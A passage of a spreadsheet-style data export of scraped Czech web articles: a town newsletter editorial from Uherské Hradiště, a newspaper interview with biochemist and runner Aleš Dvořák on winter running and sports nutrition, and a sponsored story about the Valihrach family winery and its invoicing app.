Autor: Autor článku || Autor článku | redakce || redakce Rubrika transition_slide Nezařazené</t>
  </si>
  <si>
    <t>20241101_693_3297996162_5565b619d786f84f5715.html</t>
  </si>
  <si>
    <t>5565b619d786f84f5715</t>
  </si>
  <si>
    <t>Úvodník</t>
  </si>
  <si>
    <t>Úvodník „Přijďte si 11. listopadu užít žehnání mladých vín, ale také si připomenout 17. listopadu spolu se studenty a pamětníky 35. výročí sametové revoluce.“ Milí čtenáři zpravodaje, ani krátící se a chladnější dny podzimu nám určitě nebrání poohlížet se po zábavě, kulturním vyžití a společenských událostech. Naše městské organizace i organizátoři kulturních akcí přicházejí s lákavými novinkami, které ve zpravodaji opět najdete v jejich nabídce, ale připravují také pravidelně se opakující akce a pořady. Velmi oblíbené je třeba Žehnání svatomartinského vína , které ve spolupráci s městem pořádá Městské informační centrum Uherské Hradiště a při němž se pravidelně zaplňuje Masarykovo náměstí vždy 11. 11. v 11 hodin. Přijďte se na příběh o svatém Martinovi i na hezký akt žehnání mladých vín podívat i letos! Pravidelně se scházíme i o necelý týden později. V den státního svátku 17. listopadu spolu se studenty, pamětníky i našimi občany uctíme letošní 35. výročí sametové revoluce – Den boje za svobodu a demokracii a Mezinárodní den studentstva. I letos se setkáme na Mariánském náměstí, kde si již tradičně při Zpívání k 17. listopadu zavzpomínáme na historický přerod naší republiky do svobodné a demokratické doby, ve které si můžeme dovolit chovat se jako svobodní Evropané, můžeme cestovat, studovat i svobodně nakládat se svým životem. S touto svobodou se spojila i naše nově navázaná mezinárodní přátelství s některými evropskými městy. Od roku 1992 jsme spřáteleni s anglickým městem Bridgwater , následně byly uzavřeny partnerské smlouvy s německým Mayenem , slovenskou Skalicou a polským Krosnem. Posledním partnerem se před 12 lety stal maďarský Sárvár. Spolupráce s těmito městy je příkladná a velmi si jí vážíme. Také proto jsme na Palackého náměstí postavili rozcestník, který plní nejen roli symbolu mezinárodní spolupráce, ale také roli edukativní, protože občanům a návštěvníkům města naše zahraniční partnery představuje a podává o nich základní informace. Jen pár desítek metrů odtud je jiná připomínka, avšak ne příliš lichotivá – bývalá uherskohradišťská věznice. Skláním se před lidmi, kteří se zasazují o to, aby připomínky toho, co se mohlo dít „za zdí“, zůstaly stále živými. Vstoupit tam je těžké a vnímat události, které se tam děly, ještě těžší, ale zapomenout jednoduše nelze. Více o aktuálním dění kolem bývalé věznice se můžete dočíst uvnitř tohoto čísla zpravodaje. Ještě připomenu, že do nechvalně proslulých míst padesátých let se můžete podívat také na svém mobilu nebo tabletu – díky virtuální aplikaci Za zdí. Tato moderní expozice nedávno získala bronz v prestižním ocenění Zlatý středník. Město se neustále snaží o postupné opravy a údržbu městského majetku, o plánování a přípravu nových investičních akcí. Myslím, že je to vidět na každém kroku, pokud ovšem chodíme s očima otevřenýma. Jsme vděční za každý podnět, který vede ke zlepšení veřejného prostoru, současně si vážíme podpory ze strany našich občanů, místních komisí a aktivního přístupu všech obyvatel města. Proto se neváhejte na nás obracet, kdykoliv si myslíte, že je to potřeba. Ať je naše město stále hezčí! Přeji vám krásné listopadové dny. Autor: Pavlína Jagošová, místostarostka Autor person Pavlína Jagošová</t>
  </si>
  <si>
    <t>12500</t>
  </si>
  <si>
    <t>20241101_694_3239760399_07c7c7a68b906266cd63.html</t>
  </si>
  <si>
    <t>07c7c7a68b906266cd63</t>
  </si>
  <si>
    <t>Běh na páse? To je jako sex s umělou pannou, říká biochemik Dvořák. Vysvětluje, jak běhat i v zimě a co před a po jíst</t>
  </si>
  <si>
    <t>Běh na páse? To je jako sex s umělou pannou, říká biochemik Dvořák . Vysvětluje, jak běhat i v zimě a co před a po jíst Ondřej Charvát redaktor Vědec Aleš Dvořák píše populárně-naučné knihy o běhu. Vedle toho mu nedávno s kolektivem autorů vyšla kniha Zeptej se vědce. V ní na řadu každodenních otázek erudovaně odpovídají různí vědci. Autor ▪ Libor Fojtík P odzim je v polovině, venku se začne čím dál víc ochlazovat a řada běžců odloží na zimu své tenisky do skříně. Dělají dobře, když je vytáhnou až na jaře? „ Určitě ne. Běhání v zimě je moje oblíbená disciplína. Když jsou mrazy, sníh a jinovatka, tak člověk jiného běžce moc nepotká. Má to ale svá pravidla, jinak může být takový běh nebezpečný ,“ říká v rozhovoru Aleš Dvořák , biochemik z Univerzity Karlovy a hobby maratonec v jednom. Osmatřicetiletý vědec od roku 2018 pracuje v Ústavu lékařské biochemie a laboratorní diagnostiky 1. lékařské fakulty UK a Všeobecné fakultní nemocnice v Praze , kde se specializuje na výzkum jater. Na fakultě zároveň vyučuje. Nyní má ale povinnosti jinde, je na půlroční stáži v rakouském Innsbrucku . O běhu napsal několik populárně-naučných knih, například Z hospody na maraton nebo Měl bys běžet, jestli to chceš stihnout. Přestat běhat nehodlá, stejně jako o tom psát knížky. Kdy jste začal běhat? V roce 2010. Když se na to podívám zpětně, tak moje začátky byly trochu směšné. Do té doby jsem vlastně nevěděl, co je to běh. Potřeboval jsem zhubnout , protože už jsem se necítil dobře. A jelikož nesnáším kolektivní sporty, začal jsem běhat. Nebylo to ale tak lehké, po prvních čtyřech stech metrech jsem se zlomil v pase, rozdýchával se a říkal si, jak je běhání strašné. Indiánským během jsem se dostal domů, posledních sto metrů už jsem jenom šel, aby soused neviděl, že se snažím běhat. Pak mi ale došlo, že mě pohyb stál deset minut času a nebylo to vlastně tak špatné. Vzdálenosti jsem začal prodlužovat a do měsíce jsem běhal pětikilometrový okruh. Dnes si člověk koupí hodinky a parádní boty ještě před tím, než vůbec poprvé vyběhne. Já neměl nic, jen kecky z brigády na stavbě. Vzdálenosti jsem jen odhadoval. Kdybyste začínal s během nyní, co byste změnil? Aby to tělo tolik nebolelo. Začal bych dříve posilovat střed těla, záda a ramena. Tyto části mého těla opravdu trpěly. Možná bych se to dozvěděl na běžeckých fórech, odmítal jsem je ale číst. Začal jsem dost zhurta, říkal jsem si, že přece není na co čekat a nač se šetřit. To asi byla v začátcích chyba. Nemám ale rád tvrzení „když člověk nemůže, tak se má při běhu zastavit, vydýchat a pokračovat“. Vždy mi přišlo lepší trasu naplánovat podle toho, abych ji uběhl. Vždyť řada běžců už se po odpočinku nerozběhne. Nikdy bych už také neběhal v bavlněném triku. Rychle a hodně se propotí, přilepí se a odírá bradavky. A kvůli tvrdým povrchům mě bolela bedra, proto by začátečník měl běhat spíš na měkčím terénu. Nyní už jste ale hobby maratonec, napsal jste o běhu několik knih. Progres je tedy značný. Přijde mi, že jsem po čtrnácti letech stále začátečník. Obdivuji lidi, kteří mají posedlost běhat za každou cenu. To já nemám, nemusím rutinní běhy. Chodím běhat hlavně kvůli turistice a poznávání nových míst. Když jsem někde na konferenci, jdu místo oběda běhat. Za hodinu se podívám na místa, kam bych jinak šel tři hodiny. Běhám ale v sinusoidě: mám období, kdy běhám hodně a kdy málo. Nyní málo, protože jsem na stáži v Innsbrucku a tam jsou to samé kopce. Během covidu jsem ale naběhal přes dva tisíce kilometrů za rok, týdně to vycházelo na více než 40 kilometrů. Když člověk běhá takové vzdálenosti, tak už je to opravdu znát na zdraví, výdrži a kondici. Existuje nějaká hranice, kdy by si člověk měl říct stop a nepřehánět to? Podle mě taková hranice není. Nejsou objektivní důvody, aby se člověk šetřil nebo omezoval. Ne? Nedávno jsem byl osm dní v řadě běhat a bez upozornění hodinek bych si to ani neuvědomil. Přítelkyně mi pak říkala, že bych si měl taky dát aspoň den bez běhu, aby tělo zregenerovalo. Záleží, jak člověk běhá. Vytrvalostní běhy, kdy se nedosahuje závratných tepů, zvládneme každý den. Intervalové tréninky se doporučují jen dvakrát týdně, protože tělo hodně vyčerpají. Když ale člověk neřeší ubírání minut v blížícím se závodě a neabsolvuje těžké tréninky, tak každodenní běh je normální. Když se člověk příjemně zadýchá a vyloženě u toho netrpí, tak může běhat často. „Poslední dobou mě ale oslovují terénní běhy. Spojuje se v nich výkon a turistika. To mě baví,“ říká vědec z 1. lékařské fakulty Univerzity Karlovy. Foto: archiv Aleše Dvořáka Mezi skupinou běžců je populární takzvaná tepová zóna dva. U každého je jiná, většinou se pohybuje do dvou třetin maximální tepové frekve nce. V mém případě se většinou ale do 135 tepů za minutu udržet nezvládnu. Mělo by se běhat pomalu? Jak kdy. Obecné poučky říkají, že v zóně dva se buduje vytrvalost. Ale řada běžců ji nestřídá s intervalovými běhy, kdy se dostanete na laktátový práh (intenzita cvičení, při které se začne kyselina mléčná v krevním řečišti akumulovat – pozn. red.) , což by mě la . Za touto hranicí se totiž buduje jak odolnost vůči laktátu, tak rychlost, kterou běžec zužitkuje v závodě. Laktát je molekula se spoustou pozitivních vlivů na regeneraci, růst svalů a pravděpodobně i kognitivní funkce mozku. Mohlo by to vysvětlovat, proč sportující studenti dosahují při zkouškovém období lepších studijních výsledků než nesportovci. Na laktát při běhu reagují receptory v těle, vysílají signály do mozku a v momentě, kdy je laktátu moc, tak mozek pohyb utlumí, aby se tělo nepoškodilo. Proto si musíme zvykat na laktát. Když je člověk natrénovaný, tak koncentrace laktátu dosáhne kritické hranice později než u méně trénovaného. Čím rychleji běžíme, tím je laktátu v krvi více. S během se pojí i správná strava, na což se také specializujete. Co jíst před výkonem, aby se mi běželo co nejlépe? Vychází to z toho, co naše tělo při běhu potřebuje. Hodin y před během je to strava bohatá na sacharidy, aby měl člověk jistotu, že má cukrů dost. Při běhu se totiž velmi rychle spaluje. Když nemám intenzivní trénink, tak ale běhám ráno nalačno . Když se člověk večer dobře nají, tak může jít ráno běhat bez snídaně. Část zásobního cukru tělo v noci ale spotřebuje na regeneraci. Proto před intenzivním během je dobré si dát s předstihem aspoň banán nebo jablko. Při vytrvalostních bězích člověk také spaluje hodně tuku. Běžec ho ale do sebe nepotřebuje rvát za každou cenu, i hubený člověk má dostatek podkožního tuku, že mu na běh v klidu vystačí. Problém je, když při dlouhém běhu nedoplňuje cukry. Tělo začne spalovat tuk mnohem více, než by muselo. Reakce, které vedou k výrobě energie z tuku, jsou pomalé. A tím pádem zpomalí i člověk. Například na nedávném půlmaratonu mi na šestnáctém kilometru přišlo, že už nemůžu. Došla vám zásoba cukru v těle, tedy glykogen, který máme uložený ve svalech a játrech. Vyčerpá se natolik, že tělo přestane moci. Jak existuje maratonská zeď, kdy dochází tělu cukr kolem 35. kilometru, tak je taková zeď i u půlmaratonu. Jen zhruba na patnáctém. Je to rychlý závod, kdy si člověk řekne, že nemusí nic jíst, protože to dá. Ale to je omyl. Cukry je potřeba doplňovat. Každý nezvládá běh ráno. Ten, kdo běhá přes den, musí jídelníček před během více plánovat. Jak na to? Říká se, že člověk by před sportem neměl jíst dvě hodiny. Podle mě je to málo, dvě hodiny po jídle jsem ještě polonajedený. Pro mě je nejlepší mít prázdnější žaludek. Kvůli dostatku sacharidů jsem si ale jednu dobu těsně před během dával sladkou tyčinku. A bylo to chyba, hrozně blbě se mi běželo. Je to proto, že běžec vybíhající při příliš vysoké hodnotě cukru v krvi vyrábí během první půl hodiny mnohem více laktátu než běžec, který je tak akorát najedený a má glykémii vyrovnanou. Časem se to srovná, ale když si jde člověk zaběhat na chvíli po práci, tak nechce tři čtvrtě běhu protrpět kvůli tyčince. Plánování jídla je opruz a těžká empirie pro každého běžce. A co si dát po běhu? Hned po těžkém běhu se doporučují cukry, ne nutně ty jednoduché, a bílkovina v poměru tři ku jedné. Protein ideálně přírodní, nikoliv sypaný. Nejlepší je využít dobu zhruba čtyřicet minut po vyčerpávajícím výkonu. Při běhu do sebe svaly potřebují dostat všechno, co využijí pro pohyb. Když to zjednoduším: brány, které vedou dovnitř, jsou otevřené ještě chvíli po výkonu. Tomu se říká anabolické okno a při něm je nejefektivnější dodat tělu energii, aby pak tělo začalo co nejrychleji regenerovat. Co pivo po běhu, dopřejete si ho? Jasně, velmi rád. Na druhou stranu neexistuje minimální množství alkoholu , které by bylo doporučené. Jak se dříve říkalo, že sklenice vína je zdraví prospěšná, tak se ví, že to není pravda. Játra potřebujeme na regeneraci, a když do toho pošleme jedy, tak se nám regenerace prodlouží. Navíc ledviny nebývají po běhu úplně v komfortu, alkohol v nich mění rovnováhu a zhoršuje vylučování odpadních látek. Vidíte, všechno tohle vím, ale stejně si pivo po běhu dám. V zimě lidi občas neradi běhají. Měli by zazimovat tenisky? Určitě ne. Běhání v zimě je moje oblíbená disciplína. Když jsou mrazy, sníh a jinovatka, tak člověk jiného běžce moc nepotká. Má to ale svá pravidla, jinak může být takový běh nebezpečný. V zimě se zhoršuje přenos kyslíku do svalů, mění se metabolismus. Jsme ještě více závislí na sacharidech, než když běháme v létě. Z toho plynou častější rizika energetických propadů, kdy člověk zjistí, že už nemůže, přitom běhá stejným tempem jako v teple. Svaly potřebují určitou provozní teplotu, kterou si dokážou získat tím, že spalují naprázdno živiny a vyrábí si teplo. Aleš Dvořák je nyní na stáži v Rakousku . „Zkoumáme novorozeneckou žloutenku, kterou má zhruba 60 procent narozených dětí,“ říká. Foto: HN – Libor Fojtík To je problém, předpokládám. Ano. Zima je pro běh energeticky náročnější. Studený vzduch způsobuje zúžení plicních sklípků a stahuje svaly kolem dýchacích cest. Kvůli tomu máte pocit, že se dusíte. Pokud nezvolníte tempo, tak se přidusí te. Jednou se mi to stalo v závodě, opravdu to není příjemné. Musel jsem zastavit, opřít se o strom. Šly na mě mdloby, trvalo mi dvě minuty, než jsem mohl v běhu pokračovat. Zároveň se mění osmotická rovnováha na hlenu sliznice v plicích, komplikuje to dýchání. Co si z toho vzít? Jíst více sacharidů? Při bězích do deseti kilometrů bych stravovací návyky neměnil. Při větších vzdálenostech bych sacharidů přidal. I možná kvůli všem těmto komplikacím lidé chodí běhat raději na pás. Co vy? Běhat na páse? To ne. Je to náhražka, to je, jako když má člověk sex s umělou pannou. Pás jsem zkoušel, není to ale nic pro mě. Šíleně monotónní, všude jsou lidi a fitko je obehnané zrcadly. Co dělat místo běhu v zimě? Pro někoho je nepřiměřená zima už v listopadu. Běh se těžko nahrazuje. Je specifický na otřesy, a když ho člověk něčím nahradí, tak běhu rychle odvykne. Na kole člověk takový trénink neodjede, jeho tepová frekvence se nedostane do takových výšin. Jezdil jsem takhle tři měsíce na kole, pak jsem se vrátil k běhu a myslel jsem, že umřu. Svaly, které jsou zvyklé odolávat otřesům, tam najednou nebyly a naráz mě vše bolelo. Je fakt, že když chce člověk striktně trénovat běh, tak to asi musí ve velkých minusech řešit pásem. Ale to se bavíme zhruba o minus patnácti a hlouběji. Pod nulou je běhání náročnější, člověk by neměl běžet závodním tempem. Pak je otázka, jestli nutně potřebuje jít běhat, nebo jestli mu nestačí se jít jen projít ven. Když potřebuju trénovat, tak pás je asi dostačující. Posloucháte něco při běhu? Někomu to vadí, že to ovlivňuje jeho tempo a nesoustředí se na správný dech. Chápu, že někdo chce poslouchat svůj dech, já to ale nechci. Poslouchám hudbu, miluji to. Nejlepší je, když vyjde deska některé z mých oblíbených kapel, tak si desku poslechnu několikrát a tím mi naskakují kilometry. Při tréninku na první maraton jsem zjistil, že pokud člověk pravidelně běhá, tak se dech zesynchronizuje sám od sebe nezávisle na hudbě. Třeba na podcasty se ale při běhu soustředit nedokážu. Kdy vás napadlo spojit běhání s psaním knih? V roce 2016, když jsem dokončoval postgraduál a musel jsem dát dohromady disertační práci. Přijít do práce a začít psát pro mě bylo těžké. Abych se rozepsal, tak jsem začal sepisovat deníček z tréninků na první maraton. Bavilo mě to, rozjel jsem se a pak přeskočil na disertaci. Nakonec se to hezky propojilo, protože běžec musí o biochemii přemýšlet. Velká část první knihy vznikla v práci. Tvářil jsem se, že píši disertaci, ale nebylo to tak. Těžké pak bylo i shánění financí na vydání knihy. Člověk něco napíše a co s tím? Nakonec se to sešlo, protože kniha byla o Mělnickém maratonu a já jako rodák jsem si požádal na městě o dotaci a dostal jsem ji. Budete v psaní knih pokračovat? Nedávno vám vyšla kniha z jiného než běžeckého prostředí Zeptej se vědce. Sice jsem si před časem řekl, že o běhu už psát nebudu, že téma je vyčerpané, ale není. Chystáme knihu s běžcem Milošem Škorpilem a o dalším projektu zatím z pověrčivosti nebudu mluvit. Nyní jste na půlroční stáži v Innsbrucku . Čemu se tam věnujete? Zkoumáme novorozeneckou žloutenku, kterou má zhruba 60 procent narozených dětí. Jednou z metod léčby je svícení modrým světlem (fototerapie), což je bezpečná a neinvazivní léčba. Používá se od 50. let, v posledních deseti až dvaceti letech se ale začaly objevovat teorie o tom, že modré světlo nemusí být absolutně bezpečné. Teorie tvrdí, že děti po svícení mají větší pravděpodobnost vzniku alergií a astmatu. A my se ptáme proč, a jestli to spolu souvisí. Výzkum má vést k tomu, jestli je opravdu fototerapie bez vedlejších účinků a zda by se s ní nemohlo trochu šetřit. Čas v Rakousku je pro mě čistě o vědě. V Česku na fakultě totiž na bádání nemám tolik času. Vyběhnout si mezi alpské štíty Když se Aleše Dvořáka zeptáte, jaký je jeho nejoblíbenější závod, chvílí váhá. Pak ale spustí: „Řada lidí nadává na pražský maraton, mně ale v kategorii dlouhých silničních běhů přijde jako fajn závod. Dokonce jsem si tam udělal i osobní rekord v čase kolem tří hodin a padesáti minut (mezi rekreačními běžci jde o nadstandardní čas). Na to jsem hodně trénoval. Poslední dobou mě ale dost oslovují terénní běhy. Spojuje se v nich výkon a turistika. To mě baví,“ říká vědec z 1. lékařské fakulty Univerzity Karlovy. Proto nyní běhá hlavně trailrunningové závody, tedy ty po nezpevněných nebo zčásti zpevněných cestách v přírodě. Jeden z nejhezčích závodů pro něj proto byl maraton v Ramsau am Dachstein v rakouském Štýrsku . „Super byl i půlmaraton na Stubaiském ledovci, kde se stoupá dva kilometry nahoru a končí u lanovky. Příroda tam je nádherná. Mám rád ale i běhy na Kokořínsku , například osmadvacetikilometrový závod Kokořínské roklinky,“ vypráví Dvořák . S během začal osmatřicetiletý biochemik v roce 2010, aby zhubnul. Od té doby má za sebou jedenáct maratonů, podobné číslo má i v kolonce půlmaratonů a nespočet dalších závodů na různé vzdálenosti. Na ně chodí v průměru jednou za tři měsíce. Jeho nejkratší byl 1,1 kilometru, což byla časovka kolem rybníka, při které měl opravdu rychlé tempo, kilometr za 3 minuty 50 sekund, nejdelší kolem devadesáti. „Ale to byla spíš chůze,“ směje se. Další závody stále hledá. Rád by se kvalifikoval na závod 50 kilometrů kolem Mont Blancu . „Jednou už jsem si tu horu vylezl, rád bych se tam vrátil. Je to tam nádherné. Na tento závod se ale sbírají speciální kvalifikační body, tak uvidíme. Věřím, že se tam jednou dostanu,“ přeje si. Není možné, že by vás zlákalo bádání v Rakousku natolik, že byste se mu tam zůstal věnovat víc? Nepřemýšlím nad tím, že bych v Rakousku zůstal. Celý výzkum je ale na delší dobu než na půl roku. Bylo by fajn, kdybych tam mohl být déle, ale těším se zpět do Česka . Bude potřeba z výzkumu vytvořit publikaci, na které se budu podílet. V Innsbrucku je to fajn, jsem tam visiting scientist, nemám tedy žádné závazky, nemusím se účastnit žádných schůzí a porad, když nechci. Nemusím si vyplňovat pracovní deník. Zůstává mi tam jen věda. Je to val, který mě chrání před byrokratickou zátěží, která by mě tam otravovala asi jako v Praze . Jak to myslíte? V Praze mi spoustu času sebere papírování a vyplňování lejster. Když potřebuju objednat chemikálie do laboratoře, tak mi jen papírování a schvalovací proces zabere několik dní. Rakušané se smějí, že jsme tolik pünktlich kvůli tomu, že jsme byli taky součástí Rakouska-Uherska . Smutné je, že jsme v tom asi ještě horší než oni sami. Zlepší se to? Pevně v to věřím. Musí, vždyť současný stav je děsný. Byrokratickou zátěží jsem zavalený a nezbývá mi radost z čisté vědy. Naše fakulta se chlubí tím, že třetina lidí je úředníků. Je samozřejmě fajn, že univerzita nedává práci pouze vysokoškolákům a vědcům. Ale na druhou stranu o to více platí „dej blbcovi funkci a vymyslí papír“. Nechybí vám v Praze ta surová věda? Chybí. Paradoxně nejlepší situace nastala v období covidu, kdy všichni úředníci odešli domů na home office a nám nezbývalo nic jiného než bádat, stihli jsme toho fakt hodně . Bylo to čistě o vědě, nemuseli jsme řešit x papírů při objednávání chemikálií, někdo to schválil z domova během chvíle. Toto období ukázalo, jak moc jsme zavalení byrokracií. Zlepšilo se to od té doby? Ne, zhoršuje se to. Aleš Dvořák by se rád kvalifikoval na závod 50 kilometrů kolem Mont Blancu . Má za sebou mimo jiné závody v rakouském Ramsau či na Stubaiském ledovci. Foto: archiv Aleše Dvořáka Kolik vám sebere času výuka a kolik věda? Výuka hodně, ta sebere hodně času kvůli přípravám. U vědy je to nevyzpytatelné, v laboratoři nemám striktně danou pracovní dobu. Jsou potřeba výsledky, ale je jedno, jestli nad tím strávím šest hodin nebo deset. Je těžké přepnout do popularizačně vědeckého psaní z toho akademického? Ani ne. Jak člověk stále nasává informace, ať už do výuky, nebo do psaní, tak popularizace je o to jednodušší. Odlehčit si těžkopádné akademické publikace tvořením pro laiky je radost. Stejně jako si rád jdu zaběhat, tak si rád něco sepíšu pro širokou veřejnost. Sledujete, co se nyní ve vědeckém světě děje? Jak se hovoří o tom, že Evropě ve vědě a výzkumu ujíždí vlak v porovnání s Čínou a USA ? Nesleduji. Ani v jedné zemi jsem vědu nedělal, ale slýchávám, že vědci v USA a Číně mají dost nemilosrdnou pracovní dobu. Číňané sekají publikace jako Baťa cvičky. Když oponujeme čínské články, tak je to děs, nekvalitní. Je znát, že jedou na kvantitu. V jakém stavu je podle vás česká věda? V dobrém. Máme spoustu skvělých lidí a zajímavých výsledků a patentů. Česká věda není ve světě za chudáka nebo otloukánka. Nyní máte porovnání s Rakouskem . Co Česku chybí? Rakouská věda je podle mého více organizovaná a vědci se nestarají pouze sami o sebe. Ve všech českých laborkách, kde jsem byl, mi přišlo, že se navzájem málo komunikuje. Ve vědeckých skupinách se přitom množiny výzkumu často protínají, mělo by se o tom společně více mluvit. Na naší fakultě máme každý týden poradu o výuce, ale o vědě máme poradu jednou za rok. Řekne se, že se to bude řešit ad hoc, ale nikdy se to neděje. To je škoda a chyba. V Česku je velký problém s penězi ve vědě. Platy nejsou extra vysoké, ale liší se to fakulta od fakulty. Udržet si kvalitní vědce je těžké. Nechci shodit sám sebe nebo ostatní vědce, ale když je někdo extra dobrý, tak má ambice jít do zahraničí a naše instituce nemají peníze na to, aby takového člověka přeplatily. Vy nemáte ambici jít ven? Já si ambici plním nyní v Rakousku . Jsem na stáži u soukromé firmy, která jako jediná na světě vyrábí stroje na zevrubné měření mitochondriální respirace buněk a tkání. Jelikož mě mitochondrie baví a zajímají i kvůli běhání, tak ka m jinam bych měl jet než k samotnému zdroji informací. Uvidíme, jestli budoucnost něco dalšího nahraje. #běh #běhání #věda #věda a výzkum #vědec # Univerzita Karlova #sport #zima #dlouhověkost #zdraví #zdravá výživa #maraton #Víkend HN #newsletter Týden s technologiemi Tento článek máte je zdarma. Když si předplatíte HN, budete moci číst všechny naše články nejen na vašem aktuálním připojení . Vaše předplatné brzy skončí. Předplaťte si HN a můžete i nadále číst všechny naše články. Nyní první 2 měsíce jen za 40 Kč. Veškerý obsah HN.cz Možnost kdykoliv zrušit Odemykejte obsah pro přátele Ukládejte si články na později Všechny články v audioverzi + playlist za 40 Kč nebo za 80 Kč Navíc mobilní aplikace a web bez reklam Autor: Ondřej Charvát Autor Ondřej Charvát Rubrika transition_slide Vikend</t>
  </si>
  <si>
    <t>20241101_695_3379547876_832255592930d773f5cd.html</t>
  </si>
  <si>
    <t>832255592930d773f5cd</t>
  </si>
  <si>
    <t>Rodinné vinařství, které kraluje světovým soutěžím</t>
  </si>
  <si>
    <t>Rodinné vinařství, které kraluje světovým soutěžím Redakce Pan Valihrach ml. se narodil do světa nekonečných vinohradů, dřevěných sudů a korkových zátek. Foto: Archiv Vinařství Valihrach Tentokrát nás podnikatelský příběh zavede do malé obce Krumvíř ve Velkopavlovické vinařské podoblasti. Právě zde se totiž Josef Valihrach v roce 1990 rozhodl uskutečnit svůj velký sen – založit vlastní vinařství, čímž započal rozkvět Vinařství Josef Valihrach . A tak jako každá kapka vína vypráví příběh vinice, my se dnes podíváme, jakou roli v příběhu tohoto rodinného vinařství sehrává mPOHODA. Jak to vlastně všechno začalo? „Otec vždycky věděl, že pokud mu to bude umožněno, tak chce navázat na rodinnou tradici a vinařit. Rodiče se do toho pustili hned po hlavě a s obrovským nasazením se jim tu povedlo nastartovat rodinné vinařství v době, kdy jich tu bylo jenom pár. Dnes si to ani nedokáži představit, jaké problémy se tehdy musely řešit,“ říká enolog Josef Valihrach ml. „Naše generace má v mnoha ohledech situaci již mnohem lehčí, ale velmi dobře si pamatujeme i začátky. Přestože jsme byli děti, tak veškerý život byl vždy s vinařením propojený. Je to náročné, ale máme to štěstí, že sem tam plody naší práce někomu udělají radost, a to je velká motivace jít dál.“ Pan Valihrach ml. se narodil do světa nekonečných vinohradů, dřevěných sudů a korkových zátek. Vznešené vinařské umění s sebou však přináší mnoho činností jak manuálních, tak administrativních. „Dalo by se říct, že něco jako běžný den ve vinařství neexistuje, variabilita práce je obrovská a každý musí umět zastat mnoho pracovních pozic. Proto jsem třeba já hledal nějakou flexibilnější možnost fakturace už v době, kdy jsem mamince s doklady jen pomáhal.“ „Je až neuvěřitelné, jak u nás šlo vinařství v relativně krátké době nahoru. I já si pamatuji, jak se na nás v zahraničí dívali s lehkým despektem, a dnes již naše vína mají svůj věhlas i na světových soutěžích. Letos se nám znovu povedlo vyhrát Chardonnay-du-Monde a zároveň získat hlavní cenu při Mondial des Vins Blancs Strasbourg,“ popisuje jen pár úspěchů, kterých rodina Valihrachů dosáhla. Z těch nejvýznamnějších lze uvést již zmíněné Chardonnay-du-Monde, kde si připsali již čtvrté vítězství, či několikanásobný titul Vinař roku České republiky . Tato ocenění jenom potvrzují, že si Vinařství Valihrach vybudovalo ve světě vín významné postavení, a to nejen u nás, ale i v zahraničí. Kam se chce posouvat dál? „Srovnání se světovou konkurencí vás hodně posouvá dopředu a velmi si vážíme i toho, že nás často zvou jako porotce mezinárodních klání. Hodně vám to dá, hlavně když máte možnost poznat realitu zemí, kde nebyla vinařská tradice přerušena tak, jako tomu bylo u nás. Svět vína je však neúprosný – jak konkurencí, tak tlakem na cenu a módní trendy. My jsme vždycky stáli trochu jinde a nepatřili do žádné ze zažitých škatulek. To bude největší výzva do budoucnosti – zachovat rodinnou autenticitu a zároveň zohledňovat moderní trendy. Ale rozhodně ne prvoplánově.“ Vznešené vinařské umění s sebou však přináší mnoho činností jak manuálních, tak administrativních. Foto: Archiv Vinařství Valihrach Pro administraci a fakturaci si Josef Valihrach ml. zvolil mobilní aplikaci mPohodu. „Nejpodstatnější je, že mPOHODA šetří čas. Dřív jsme měli jeden počítač vyhrazený pro fakturaci a jelikož jsme málokdy na jednom místě, tak to bylo organizačně docela náročné. Takto se k mPohodě připojím kdykoli a na jakémkoli zařízení. Přesně si pamatuji, že loni ke konci roku mi mPOHODA velmi pomohla. Bylo to časově velmi náročné období, zrovna jsem rozvážel víno a po handsfree řešil se zákazníkem detaily formátu nabídky, objednávky atd. Během toho dne jsem třikrát upravoval, na koho a jak vypracovat nabídku. Kdybych vše nemohl udělat během pár minut různě na benzinkách, asi bychom nakonec o tento obchod přišli…“ vzpomíná, načež dodává: „…také možnosti detailního rozdělení fakturačních subjektů a jejich dodacích adres, flexibilní fakturace v jiných měnách atd. jsou velkým přínosem. “ Pro vedení účetnictví používají ve vinařství program POHODA, se kterým se mPOHODA skvěle doplňuje. A pro pana Valihracha ml. toto propojení znamená svobodu při práci. „Pohodu používají naši účetní a já se v pokročilých funkcích bohužel vůbec nevyznám. Nakonec jsem zjistil, že téměř vše zvládnu v mPohodě, která je navíc dostupná i v mobilu i všude přes web. “ Důvody, proč mi vyhovuje mPOHODA: Personalizace podpisu a textů pod fakturou Integrace mailingu Grafické přehledy Rychlost Přehlednost Odeslat e-mailem Vaše jméno: E-mail příjemce: Zadejte e-mail ve správném formátu Zadejte e-mail Předmět e-mailu: Zpráva: Vložte bezpečnostní kód: Diskuse neslouží jako právní, daňová či účetní poradna. Je vyhrazena pro vzájemnou komunikaci čtenářů. Uživatelské jméno: Zadaná e-mailová adresa je neplatná. Zadejte prosím svou e-mailovou adresu. Text zprávy: Přihlásit mě k odběru této diskuze. Zadejte e-mailovou adresu. Zadaná e-mailová adresa je neplatná. Rychlé zprávy Paušální daň v roce 2025 14. 11. 2024 | Od ledna 2025 se zvýší paušální daň v prvním pásmu z 7 498 Kč na 8 765 Kč kvůli růstu průměrné mzdy, která ovlivňuje odvody na pojištění. Platby ve druhém pásmu (16 745 Kč) a třetím pásmu (27 139 Kč) zůstávají beze změny. Zálohy jsou splatné do 20. dne každého měsíce. Podnikatelé, kteří chtějí ukončit účast v paušálním režimu, musí oznámení podat do 10. ledna 2025. Tato lhůta platí i pro oznámení o vstupu do paušálního režimu.</t>
  </si>
  <si>
    <t>12220</t>
  </si>
  <si>
    <t>20241101_696_3387127205_52e5eed6116a0d29447c.html</t>
  </si>
  <si>
    <t>52e5eed6116a0d29447c</t>
  </si>
  <si>
    <t>Speciál: Změna směru</t>
  </si>
  <si>
